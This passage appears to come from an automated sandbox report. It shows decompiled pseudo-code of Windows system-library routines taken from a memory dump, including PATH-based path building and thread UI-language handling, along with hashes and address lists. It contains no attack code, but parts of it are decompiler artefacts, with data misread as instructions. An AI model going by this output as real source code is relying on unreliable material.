                											L40:
                											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                											 *(_t114 - 4) = 1;
                											_push(_t114 - 0x74);
                											L018EDEF0(_t99, _t106);
                											 *(_t114 - 4) = 0xfffffffe;
                											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                											goto L3;
                										}
                										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                											goto L40;
                										}
                										_push( *((intOrPtr*)(_t114 + 8)));
                										_push( *((intOrPtr*)(_t114 - 0x9c)));
                										_push(_t99 & 0x0000ffff);
                										_push(_t108);
                										_push(1);
                										_t101 = E018DB280();
                										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                										if( *((char*)(_t114 + 0x14)) == 1) {
                											__eflags = _t101 - 0x80000003;
                											if(_t101 == 0x80000003) {
                												E018DB7E0(1);
                												_t101 = 0;
                												__eflags = 0;
                											}
                										}
                										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                										goto L4;
                									}
                									__eflags = _t109 - 0x80000005;
                									if(_t109 == 0x80000005) {
                										continue;
                									}
                									break;
                								}
                								 *(_t114 - 0x90) = 0;
                								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                								_t91 = E018DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                								_t115 = _t115 + 0x10;
                								_t104 = _t91;
                								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                								__eflags = _t104;
                								if(_t104 < 0) {
                									L21:
                									_t109 = 0x80000005;
                									 *(_t114 - 0x90) = 0x80000005;
                									L22:
                									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                									L23:
                									 *(_t114 - 0x94) = _t109;
                									goto L26;
                								}
                								__eflags = _t104 - _t92;
                								if(__eflags > 0) {
                									goto L21;
                								}
                								if(__eflags == 0) {
                									goto L22;
                								}
                								goto L23;
                							}
                							goto L15;
                						}
                					}
                					__eflags = _t109;
                					if(_t109 >= 0) {
                						goto L31;
                					}
                					__eflags = _t109 - 0x80000005;
                					if(_t109 != 0x80000005) {
                						goto L31;
                					}
                					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                					_t38 = _t95 - 1; // -129
                					_t99 = _t38;
                					goto L34;
                				}
                				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                					__eflags = __edx - 0x65;
                					if(__edx != 0x65) {
                						goto L2;
                					}
                					goto L6;
                				}
                				L2:
                				_push( *((intOrPtr*)(_t114 + 8)));
                				_push(_t106);
                				if(E018DA890() != 0) {
                					goto L6;
                				}
                				goto L3;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: _vswprintf_s
                • String ID:
                • API String ID: 677850445-0
                • Opcode ID: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                • Instruction ID: ce5285865a2780fa3f1b0083e058a57bce231662fac3dd41bdef87bd2afef046
                • Opcode Fuzzy Hash: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                • Instruction Fuzzy Hash: B851E171E1025A8EDF35CF68C844BAEBBB0AF01714F1442AEDA59EB292D7704A45CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E018C2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200456, char _a1546912136) {
                				signed int _v8;
                				signed int _v16;
                				unsigned int _v24;
                				void* _v28;
                				signed int _v32;
                				unsigned int _v36;
                				signed int _v37;
                				signed int _v40;
                				signed int _v44;
                				signed int _v48;
                				signed int _v52;
                				signed int _v56;
                				intOrPtr _v60;
                				signed int _v64;
                				signed int _v68;
                				signed int _v72;
                				signed int _v76;
                				signed int _v80;
                				signed int _t249;
                				signed int _t253;
                				signed int _t254;
                				signed int _t257;
                				signed int _t259;
                				intOrPtr _t261;
                				signed int _t264;
                				signed int _t271;
                				signed int _t274;
                				signed int _t282;
                				intOrPtr _t288;
                				signed int _t290;
                				signed int _t292;
                				void* _t293;
                				signed int _t294;
                				unsigned int _t297;
                				signed int _t301;
                				intOrPtr* _t302;
                				signed int _t303;
                				signed int _t307;
                				intOrPtr _t320;
                				signed int _t329;
                				signed int _t331;
                				signed int _t332;
                				signed int _t336;
                				signed int _t337;
                				signed int _t340;
                				signed int _t342;
                				signed int _t345;
                				void* _t346;
                				void* _t348;
                
                				_t342 = _t345;
                				_t346 = _t345 - 0x4c;
                				_v8 =  *0x198d360 ^ _t342;
                				_push(__ebx);
                				_push(__esi);
                				_push(__edi);
                				_t336 = 0x198b2e8;
                				_v56 = _a4;
                				_v48 = __edx;
                				_v60 = __ecx;
                				_t297 = 0;
                				_v80 = 0;
                				asm("movsd");
                				_v64 = 0;
                				_v76 = 0;
                				_v72 = 0;
                				asm("movsd");
                				_v44 = 0;
                				_v52 = 0;
                				_v68 = 0;
                				asm("movsd");
                				_v32 = 0;
                				_v36 = 0;
                				asm("movsd");
                				_v16 = 0;
                				_t288 = 0x48;
                				_t317 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                				_t329 = 0;
                				_v37 = _t317;
                				if(_v48 <= 0) {
                					L16:
                					_t45 = _t288 - 0x48; // 0x0
                					__eflags = _t45 - 0xfffe;
                					if(_t45 > 0xfffe) {
                						_t337 = 0xc0000106;
                						goto L32;
                					} else {
                						_t336 = L018B4620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                						_v52 = _t336;
                						__eflags = _t336;
                						if(_t336 == 0) {
                							_t337 = 0xc0000017;
                							goto L32;
                						} else {
                							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
                							_t50 = _t336 + 0x48; // 0x48
                							_t331 = _t50;
                							_t317 = _v32;
                							 *((intOrPtr*)(_t336 + 0x3c)) = _t288;
                							_t290 = 0;
                							 *((short*)(_t336 + 0x30)) = _v48;
                							__eflags = _t317;
                							if(_t317 != 0) {
                								 *(_t336 + 0x18) = _t331;
                								__eflags = _t317 - 0x1988478;
                								 *_t336 = ((0 | _t317 == 0x01988478) - 0x00000001 & 0xfffffffb) + 7;
                								E018DF3E0(_t331,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
                								_t317 = _v32;
                								_t346 = _t346 + 0xc;
                								_t290 = 1;
                								__eflags = _a8;
                								_t331 = _t331 + (( *_t317 & 0x0000ffff) >> 1) * 2;
                								if(_a8 != 0) {
                									_t282 = E019239F2(_t331);
                									_t317 = _v32;
                									_t331 = _t282;
                								}
                							}
                							_t301 = 0;
                							_v16 = 0;
                							__eflags = _v48;
                							if(_v48 <= 0) {
                								L31:
                								_t337 = _v68;
                								__eflags = 0;
                								 *((short*)(_t331 - 2)) = 0;
                								goto L32;
                							} else {
                								_t292 = _t336 + _t290 * 4;
                								_v56 = _t292;
                								do {
                									__eflags = _t317;
                									if(_t317 != 0) {
                										_t249 =  *(_v60 + _t301 * 4);
                										__eflags = _t249;
                										if(_t249 == 0) {
                											goto L30;
                										} else {
                											__eflags = _t249 == 5;
                											if(_t249 == 5) {
                												goto L30;
                											} else {
                												goto L22;
                											}
                										}
                									} else {
                										L22:
                										 *_t292 =  *(_v60 + _t301 * 4);
                										 *(_t292 + 0x18) = _t331;
                										_t253 =  *(_v60 + _t301 * 4);
                										__eflags = _t253 - 8;
                										if(_t253 > 8) {
                											goto L56;
                										} else {
                											switch( *((intOrPtr*)(_t253 * 4 +  &M018C2959))) {
                												case 0:
                													__ax =  *0x1988488;
                													__eflags = __ax;
                													if(__ax == 0) {
                														goto L29;
                													} else {
                														__ax & 0x0000ffff = E018DF3E0(__edi,  *0x198848c, __ax & 0x0000ffff);
                														__eax =  *0x1988488 & 0x0000ffff;
                														goto L26;
                													}
                													goto L108;
                												case 1:
                													L45:
                													E018DF3E0(_t331, _v80, _v64);
                													_t277 = _v64;
                													goto L26;
                												case 2:
                													 *0x1988480 & 0x0000ffff = E018DF3E0(__edi,  *0x1988484,  *0x1988480 & 0x0000ffff);
                													__eax =  *0x1988480 & 0x0000ffff;
                													__eax = ( *0x1988480 & 0x0000ffff) >> 1;
                													__edi = __edi + __eax * 2;
                													goto L28;
                												case 3:
                													__eax = _v44;
                													__eflags = __eax;
                													if(__eax == 0) {
                														goto L29;
                													} else {
                														__esi = __eax + __eax;
                														__eax = E018DF3E0(__edi, _v72, __esi);
                														__edi = __edi + __esi;
                														__esi = _v52;
                														goto L27;
                													}
                													goto L108;
                												case 4:
                													_push(0x2e);
                													_pop(__eax);
                													 *(__esi + 0x44) = __edi;
                													 *__edi = __ax;
                													__edi = __edi + 4;
                													_push(0x3b);
                													_pop(__eax);
                													 *(__edi - 2) = __ax;
                													goto L29;
                												case 5:
                													__eflags = _v36;
                													if(_v36 == 0) {
                														goto L45;
                													} else {
                														E018DF3E0(_t331, _v76, _v36);
                														_t277 = _v36;
                													}
                													L26:
                													_t346 = _t346 + 0xc;
                													_t331 = _t331 + (_t277 >> 1) * 2 + 2;
                													__eflags = _t331;
                													L27:
                													_push(0x3b);
                													_pop(_t279);
                													 *((short*)(_t331 - 2)) = _t279;
                													goto L28;
                												case 6:
                													__ebx =  *0x198575c;
                													__eflags = __ebx - 0x198575c;
                													if(__ebx != 0x198575c) {
                														_push(0x3b);
                														_pop(__esi);
                														do {
                															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                															E018DF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                															__edi = __edi + __eax * 2;
                															__edi = __edi + 2;
                															 *(__edi - 2) = __si;
                															__ebx =  *__ebx;
                															__eflags = __ebx - 0x198575c;
                														} while (__ebx != 0x198575c);
                														__esi = _v52;
                														__ecx = _v16;
                														__edx = _v32;
                													}
                													__ebx = _v56;
                													goto L29;
                												case 7:
                													 *0x1988478 & 0x0000ffff = E018DF3E0(__edi,  *0x198847c,  *0x1988478 & 0x0000ffff);
                													__eax =  *0x1988478 & 0x0000ffff;
                													__eax = ( *0x1988478 & 0x0000ffff) >> 1;
                													__eflags = _a8;
                													__edi = __edi + __eax * 2;
                													if(_a8 != 0) {
                														__ecx = __edi;
                														__eax = E019239F2(__ecx);
                														__edi = __eax;
                													}
                													goto L28;
                												case 8:
                													__eax = 0;
                													 *(__edi - 2) = __ax;
                													 *0x1986e58 & 0x0000ffff = E018DF3E0(__edi,  *0x1986e5c,  *0x1986e58 & 0x0000ffff);
                													 *(__esi + 0x38) = __edi;
                													__eax =  *0x1986e58 & 0x0000ffff;
                													__eax = ( *0x1986e58 & 0x0000ffff) >> 1;
                													__edi = __edi + __eax * 2;
                													__edi = __edi + 2;
                													L28:
                													_t301 = _v16;
                													_t317 = _v32;
                													L29:
                													_t292 = _t292 + 4;
                													__eflags = _t292;
                													_v56 = _t292;
                													goto L30;
                											}
                										}
                									}
                									goto L108;
                									L30:
                									_t301 = _t301 + 1;
                									_v16 = _t301;
                									__eflags = _t301 - _v48;
                								} while (_t301 < _v48);
                								goto L31;
                							}
                						}
                					}
                				} else {
                					while(1) {
                						L1:
                						_t253 =  *(_v60 + _t329 * 4);
                						if(_t253 > 8) {
                							break;
                						}
                						switch( *((intOrPtr*)(_t253 * 4 +  &M018C2935))) {
                							case 0:
                								__ax =  *0x1988488;
                								__eflags = __ax;
                								if(__ax != 0) {
                									__eax = __ax & 0x0000ffff;
                									__ebx = __ebx + 2;
                									__eflags = __ebx;
                									goto L53;
                								}
                								goto L14;
                							case 1:
                								L44:
                								_t317 =  &_v64;
                								_v80 = E018C2E3E(0,  &_v64);
                								_t288 = _t288 + _v64 + 2;
                								goto L13;
                							case 2:
                								__eax =  *0x1988480 & 0x0000ffff;
                								__ebx = __ebx + __eax;
                								__eflags = __dl;
                								if(__dl != 0) {
                									__eax = 0x1988480;
                									goto L80;
                								}
                								goto L14;
                							case 3:
                								__eax = E018AEEF0(0x19879a0);
                								__eax =  &_v44;
                								_push(__eax);
                								_push(0);
                								_push(0);
                								_push(4);
                								_push(L"PATH");
                								_push(0);
                								L57();
                								__esi = __eax;
                								_v68 = __esi;
                								__eflags = __esi - 0xc0000023;
                								if(__esi != 0xc0000023) {
                									L10:
                									__eax = E018AEB70(__ecx, 0x19879a0);
                									__eflags = __esi - 0xc0000100;
                									if(__esi == 0xc0000100) {
                										_v44 = _v44 & 0x00000000;
                										__eax = 0;
                										_v68 = 0;
                										goto L13;
                									} else {
                										__eflags = __esi;
                										if(__esi < 0) {
                											L32:
                											_t227 = _v72;
                											__eflags = _t227;
                											if(_t227 != 0) {
                												L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t227);
                											}
                											_t228 = _v52;
                											__eflags = _t228;
                											if(_t228 != 0) {
                												__eflags = _t337;
                												if(_t337 < 0) {
                													L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t228);
                													_t228 = 0;
                												}
                											}
                											goto L36;
                										} else {
                											__eax = _v44;
                											__ebx = __ebx + __eax * 2;
                											__ebx = __ebx + 2;
                											__eflags = __ebx;
                											L13:
                											_t297 = _v36;
                											goto L14;
                										}
                									}
                								} else {
                									__eax = _v44;
                									__ecx =  *0x1987b9c; // 0x0
                									_v44 + _v44 =  *[fs:0x30];
                									__ecx = __ecx + 0x180000;
                									__eax = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                									_v72 = __eax;
                									__eflags = __eax;
                									if(__eax == 0) {
                										__eax = E018AEB70(__ecx, 0x19879a0);
                										__eax = _v52;
                										L36:
                										_pop(_t330);
                										_pop(_t338);
                										__eflags = _v8 ^ _t342;
                										_pop(_t289);
                										return E018DB640(_t228, _t289, _v8 ^ _t342, _t317, _t330, _t338);
                									} else {
                										__ecx =  &_v44;
                										_push(__ecx);
                										_push(_v44);
                										_push(__eax);
                										_push(4);
                										_push(L"PATH");
                										_push(0);
                										L57();
                										__esi = __eax;
                										_v68 = __eax;
                										goto L10;
                									}
                								}
                								goto L108;
                							case 4:
                								__ebx = __ebx + 4;
                								goto L14;
                							case 5:
                								_t284 = _v56;
                								if(_v56 != 0) {
                									_t317 =  &_v36;
                									_t286 = E018C2E3E(_t284,  &_v36);
                									_t297 = _v36;
                									_v76 = _t286;
                								}
                								if(_t297 == 0) {
                									goto L44;
                								} else {
                									_t288 = _t288 + 2 + _t297;
                								}
                								goto L14;
                							case 6:
                								__eax =  *0x1985764 & 0x0000ffff;
                								goto L53;
                							case 7:
                								__eax =  *0x1988478 & 0x0000ffff;
                								__ebx = __ebx + __eax;
                								__eflags = _a8;
                								if(_a8 != 0) {
                									__ebx = __ebx + 0x16;
                									__ebx = __ebx + __eax;
                								}
                								__eflags = __dl;
                								if(__dl != 0) {
                									__eax = 0x1988478;
                									L80:
                									_v32 = __eax;
                								}
                								goto L14;
                							case 8:
                								__eax =  *0x1986e58 & 0x0000ffff;
                								__eax = ( *0x1986e58 & 0x0000ffff) + 2;
                								L53:
                								__ebx = __ebx + __eax;
                								L14:
                								_t329 = _t329 + 1;
                								if(_t329 >= _v48) {
                									goto L16;
                								} else {
                									_t317 = _v37;
                									goto L1;
                								}
                								goto L108;
                						}
                					}
                					L56:
                					_t302 = 0x25;
                					asm("int 0x29");
                					asm("out 0x28, al");
                					 *_t302 = es;
                					asm("o16 sub [ecx+eax+0x18c27e0], cl");
                					 *[es:ecx] = es;
                					_t339 = _t336 + 1;
                					 *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2605)) - _t302;
                					_pop(ds);
                					_pop(_t293);
                					 *((intOrPtr*)(_t253 +  &_a1530200456)) =  *((intOrPtr*)(_t253 +  &_a1530200456)) + _t317;
                					 *_t317 =  *_t317 + _t253;
                					 *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) =  *((intOrPtr*)(_t302 + _t253 + 0x18c2880)) - _t302;
                					_t254 = _t253 *  *_t331;
                					 *_t302 = es;
                					_push(ds);
                					 *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) =  *((intOrPtr*)(_t302 + _t254 + 0x18c284e)) - _t302;
                					asm("daa");
                					 *_t302 = es;
                					asm("fcomp dword [ebx-0x70]");
                					 *((intOrPtr*)(_t254 +  &_a1546912136)) =  *((intOrPtr*)(_t254 +  &_a1546912136)) + _t336 + 1;
                					_t348 = _t346 + _t302;
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					asm("int3");
                					_push(0x20);
                					_push(0x196ff00);
                					E018ED08C(_t293, _t331, _t339);
                					_v44 =  *[fs:0x18];
                					_t332 = 0;
                					 *_a24 = 0;
                					_t294 = _a12;
                					__eflags = _t294;
                					if(_t294 == 0) {
                						_t257 = 0xc0000100;
                					} else {
                						_v8 = 0;
                						_t340 = 0xc0000100;
                						_v52 = 0xc0000100;
                						_t259 = 4;
                						while(1) {
                							_v40 = _t259;
                							__eflags = _t259;
                							if(_t259 == 0) {
                								break;
                							}
                							_t307 = _t259 * 0xc;
                							_v48 = _t307;
                							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0x1871664));
                							if(__eflags <= 0) {
                								if(__eflags == 0) {
                									_t274 = E018DE5C0(_a8,  *((intOrPtr*)(_t307 + 0x1871668)), _t294);
                									_t348 = _t348 + 0xc;
                									__eflags = _t274;
                									if(__eflags == 0) {
                										_t340 = E019151BE(_t294,  *((intOrPtr*)(_v48 + 0x187166c)), _a16, _t332, _t340, __eflags, _a20, _a24);
                										_v52 = _t340;
                										break;
                									} else {
                										_t259 = _v40;
                										goto L62;
                									}
                									goto L70;
                								} else {
                									L62:
                									_t259 = _t259 - 1;
                									continue;
                								}
                							}
                							break;
                						}
                						_v32 = _t340;
                						__eflags = _t340;
                						if(_t340 < 0) {
                							__eflags = _t340 - 0xc0000100;
                							if(_t340 == 0xc0000100) {
                								_t303 = _a4;
                								__eflags = _t303;
                								if(_t303 != 0) {
                									_v36 = _t303;
                									__eflags =  *_t303 - _t332;
                									if( *_t303 == _t332) {
                										_t340 = 0xc0000100;
                										goto L76;
                									} else {
                										_t320 =  *((intOrPtr*)(_v44 + 0x30));
                										_t261 =  *((intOrPtr*)(_t320 + 0x10));
                										__eflags =  *((intOrPtr*)(_t261 + 0x48)) - _t303;
                										if( *((intOrPtr*)(_t261 + 0x48)) == _t303) {
                											__eflags =  *(_t320 + 0x1c);
                											if( *(_t320 + 0x1c) == 0) {
                												L106:
                												_t340 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
                												_v32 = _t340;
                												__eflags = _t340 - 0xc0000100;
                												if(_t340 != 0xc0000100) {
                													goto L69;
                												} else {
                													_t332 = 1;
                													_t303 = _v36;
                													goto L75;
                												}
                											} else {
                												_t264 = E018A6600( *(_t320 + 0x1c));
                												__eflags = _t264;
                												if(_t264 != 0) {
                													goto L106;
                												} else {
                													_t303 = _a4;
                													goto L75;
                												}
                											}
                										} else {
                											L75:
                											_t340 = E018C2C50(_t303, _a8, _t294, _a16, _a20, _a24, _t332);
                											L76:
                											_v32 = _t340;
                											goto L69;
                										}
                									}
                									goto L108;
                								} else {
                									E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                									_v8 = 1;
                									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                									_t340 = _a24;
                									_t271 = E018C2AE4( &_v36, _a8, _t294, _a16, _a20, _t340);
                									_v32 = _t271;
                									__eflags = _t271 - 0xc0000100;
                									if(_t271 == 0xc0000100) {
                										_v32 = E018C2C50(_v36, _a8, _t294, _a16, _a20, _t340, 1);
                									}
                									_v8 = _t332;
                									E018C2ACB();
                								}
                							}
                						}
                						L69:
                						_v8 = 0xfffffffe;
                						_t257 = _t340;
                					}
                					L70:
                					return E018ED0D1(_t257);
                				}
                				L108:
                			}

                0x018c2584
                0x018c2586
                0x018c2590
                0x018c2596
                0x018c2597
                0x018c2598
                0x018c2599
                0x018c259e
                0x018c25a4
                0x018c25a9
                0x018c25ac
                0x018c25ae
                0x018c25b1
                0x018c25b2
                0x018c25b5
                0x018c25b8
                0x018c25bb
                0x018c25bc
                0x018c25bf
                0x018c25c2
                0x018c25c5
                0x018c25c6
                0x018c25cb
                0x018c25ce
                0x018c25d8
                0x018c25dd
                0x018c25de
                0x018c25e1
                0x018c25e3
                0x018c25e9
                0x018c26da
                0x018c26da
                0x018c26dd
                0x018c26e2
                0x01905b56
                0x00000000
                0x018c26e8
                0x018c26f9
                0x018c26fb
                0x018c26fe
                0x018c2700
                0x01905b60
                0x00000000
                0x018c2706
                0x018c2706
                0x018c270a
                0x018c270a
                0x018c270d
                0x018c2713
                0x018c2716
                0x018c2718
                0x018c271c
                0x018c271e
                0x01905b6c
                0x01905b6f
                0x01905b7f
                0x01905b89
                0x01905b8e
                0x01905b93
                0x01905b96
                0x01905b9c
                0x01905ba0

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: PATH
                • API String ID: 0-1036084923
                • Opcode ID: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                • Instruction ID: 0cde5366ca1c58314600aa25a42a2a22481bf368ef8d6ccec709f9fb47ff9775
                • Opcode Fuzzy Hash: 57d213d8d2a16fc1dfcfb0b6d36458b240dddac756dacdbc30a2c0b3192b4125
                • Instruction Fuzzy Hash: 9AC17D75D00219DBDB25DFACD880AADBBB6FF48B44F49402DE505EB290D734EA42CB60
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 80%
                			E018CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                				char _v5;
                				signed int _v8;
                				signed int _v12;
                				char _v16;
                				char _v17;
                				char _v20;
                				signed int _v24;
                				char _v28;
                				char _v32;
                				signed int _v40;
                				void* __ecx;
                				void* __edi;
                				void* __ebp;
                				signed int _t73;
                				intOrPtr* _t75;
                				signed int _t77;
                				signed int _t79;
                				signed int _t81;
                				intOrPtr _t83;
                				intOrPtr _t85;
                				intOrPtr _t86;
                				signed int _t91;
                				signed int _t94;
                				signed int _t95;
                				signed int _t96;
                				signed int _t106;
                				signed int _t108;
                				signed int _t114;
                				signed int _t116;
                				signed int _t118;
                				signed int _t122;
                				signed int _t123;
                				void* _t129;
                				signed int _t130;
                				void* _t132;
                				intOrPtr* _t134;
                				signed int _t138;
                				signed int _t141;
                				signed int _t147;
                				intOrPtr _t153;
                				signed int _t154;
                				signed int _t155;
                				signed int _t170;
                				void* _t174;
                				signed int _t176;
                				signed int _t177;
                
                				_t129 = __ebx;
                				_push(_t132);
                				_push(__esi);
                				_t174 = _t132;
                				_t73 =  !( *( *(_t174 + 0x18)));
                				if(_t73 >= 0) {
                					L5:
                					return _t73;
                				} else {
                					E018AEEF0(0x1987b60);
                					_t134 =  *0x1987b84; // 0x77f07b80
                					_t2 = _t174 + 0x24; // 0x24
                					_t75 = _t2;
                					if( *_t134 != 0x1987b80) {
                						_push(3);
                						asm("int 0x29");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						asm("int3");
                						_push(0x1987b60);
                						_t170 = _v8;
                						_v28 = 0;
                						_v40 = 0;
                						_v24 = 0;
                						_v17 = 0;
                						_v32 = 0;
                						__eflags = _t170 & 0xffff7cf2;
                						if((_t170 & 0xffff7cf2) != 0) {
                							L43:
                							_t77 = 0xc000000d;
                						} else {
                							_t79 = _t170 & 0x0000000c;
                							__eflags = _t79;
                							if(_t79 != 0) {
                								__eflags = _t79 - 0xc;
                								if(_t79 == 0xc) {
                									goto L43;
                								} else {
                									goto L9;
                								}
                							} else {
                								_t170 = _t170 | 0x00000008;
                								__eflags = _t170;
                								L9:
                								_t81 = _t170 & 0x00000300;
                								__eflags = _t81 - 0x300;
                								if(_t81 == 0x300) {
                									goto L43;
                								} else {
                									_t138 = _t170 & 0x00000001;
                									__eflags = _t138;
                									_v24 = _t138;
                									if(_t138 != 0) {
                										__eflags = _t81;
                										if(_t81 != 0) {
                											goto L43;
                										} else {
                											goto L11;
                										}
                									} else {
                										L11:
                										_push(_t129);
                										_t77 = E018A6D90( &_v20);
                										_t130 = _t77;
                										__eflags = _t130;
                										if(_t130 >= 0) {
                											_push(_t174);
                											__eflags = _t170 & 0x00000301;
                											if((_t170 & 0x00000301) == 0) {
                												_t176 = _a8;
                												__eflags = _t176;
                												if(__eflags == 0) {
                													L64:
                													_t83 =  *[fs:0x18];
                													_t177 = 0;
                													__eflags =  *(_t83 + 0xfb8);
                													if( *(_t83 + 0xfb8) != 0) {
                														E018A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                													}
                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                													goto L15;
                												} else {
                													asm("sbb edx, edx");
                													_t114 = E01938938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                													__eflags = _t114;
                													if(_t114 < 0) {
                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                														E0189B150();
                													}
                													_t116 = E01936D81(_t176,  &_v16);
                													__eflags = _t116;
                													if(_t116 >= 0) {
                														__eflags = _v16 - 2;
                														if(_v16 < 2) {
                															L56:
                															_t118 = E018A75CE(_v20, 5, 0);
                															__eflags = _t118;
                															if(_t118 < 0) {
                																L67:
                																_t130 = 0xc0000017;
                																goto L32;
                															} else {
                																__eflags = _v12;
                																if(_v12 == 0) {
                																	goto L67;
                																} else {
                																	_t153 =  *0x1988638; // 0x0
                																	_t122 = L018A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                																	_t154 = _v12;
                																	_t130 = _t122;
                																	__eflags = _t130;
                																	if(_t130 >= 0) {
                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                																		__eflags = _t123;
                																		if(_t123 != 0) {
                																			_t155 = _a12;
                																			__eflags = _t155;
                																			if(_t155 != 0) {
                																				 *_t155 = _t123;
                																			}
                																			goto L64;
                																		} else {
                																			E018A76E2(_t154);
                																			goto L41;
                																		}
                																	} else {
                																		E018A76E2(_t154);
                																		_t177 = 0;
                																		goto L18;
                																	}
                																}
                															}
                														} else {
                															__eflags =  *_t176;
                															if( *_t176 != 0) {
                																goto L56;
                															} else {
                																__eflags =  *(_t176 + 2);
                																if( *(_t176 + 2) == 0) {
                																	goto L64;
                																} else {
                																	goto L56;
                																}
                															}
                														}
                													} else {
                														_t130 = 0xc000000d;
                														goto L32;
                													}
                												}
                												goto L35;
                											} else {
                												__eflags = _a8;
                												if(_a8 != 0) {
                													_t77 = 0xc000000d;
                												} else {
                													_v5 = 1;
                													L018CFCE3(_v20, _t170);
                													_t177 = 0;
                													__eflags = 0;
                													L15:
                													_t85 =  *[fs:0x18];
                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                														L18:
                														__eflags = _t130;
                														if(_t130 != 0) {
                															goto L32;
                														} else {
                															__eflags = _v5 - _t130;
                															if(_v5 == _t130) {
                																goto L32;
                															} else {
                																_t86 =  *[fs:0x18];
                																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                																}
                																__eflags = _t177;
                																if(_t177 == 0) {
                																	L31:
                																	__eflags = 0;
                																	L018A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                																	goto L32;
                																} else {
                																	__eflags = _v24;
                																	_t91 =  *(_t177 + 0x20);
                																	if(_v24 != 0) {
                																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                																		goto L31;
                																	} else {
                																		_t141 = _t91 & 0x00000040;
                																		__eflags = _t170 & 0x00000100;
                																		if((_t170 & 0x00000100) == 0) {
                																			__eflags = _t141;
                																			if(_t141 == 0) {
                																				L74:
                																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                																				goto L27;
                																			} else {
                																				_t177 = E018CFD22(_t177);
